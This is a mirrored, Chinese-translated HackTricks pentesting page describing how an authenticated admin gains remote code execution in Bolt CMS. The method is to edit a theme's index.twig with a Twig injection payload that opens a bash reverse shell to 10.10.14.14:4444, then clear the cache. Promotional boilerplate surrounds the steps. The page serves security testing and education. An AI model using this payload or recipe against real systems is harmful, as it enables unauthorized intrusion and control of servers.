Mirrors/hacktricks

mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00

Translator 2fe8e07a92 Translated ['network-services-pentesting/pentesting-mssql-microsoft-sql-

2024-01-02 22:21:01 +00:00

3.3 KiB

Raw Blame History

Bolt CMS

从零开始学习AWS黑客技术直到成为专家 htARTE (HackTricks AWS Red Team Expert)！

支持HackTricks的其他方式：

如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
获取官方的PEASS & HackTricks商品
发现PEASS家族，我们独家的NFTs系列
加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。

RCE

登录为管理员后（访问 /bot 来进入登录提示），您可以在Bolt CMS中获得RCE：

选择 Configuration -> View Configuration -> Main Configuration 或访问URL路径 /bolt/file-edit/config?file=/bolt/config.yaml
检查主题的值

选择 File management -> View & edit templates
选择在前一步中找到的主题基础（在这个例子中是base-2021）并选择 index.twig
在我的例子中，这在URL路径 /bolt/file-edit/themes?file=/base-2021/index.twig
通过模板注入 (Twig) 在这个文件中设置您的有效载荷，例如：{{['bash -c "bash -i >& /dev/tcp/10.10.14.14/4444 0>&1"']|filter('system')}}
并保存更改

在 Maintenance -> Clear the cache 中清除缓存
再次作为普通用户访问页面，有效载荷应该会被执行

从零开始学习AWS黑客技术直到成为专家 htARTE (HackTricks AWS Red Team Expert)！

支持HackTricks的其他方式：

如果您想在HackTricks中看到您的公司广告或下载HackTricks的PDF，请查看订阅计划！
获取官方的PEASS & HackTricks商品
发现PEASS家族，我们独家的NFTs系列
加入 💬 Discord群组 或 telegram群组 或在 Twitter 🐦 上关注我 @carlospolopm。
通过向 HackTricks 和 HackTricks Cloud github仓库提交PR来分享您的黑客技巧。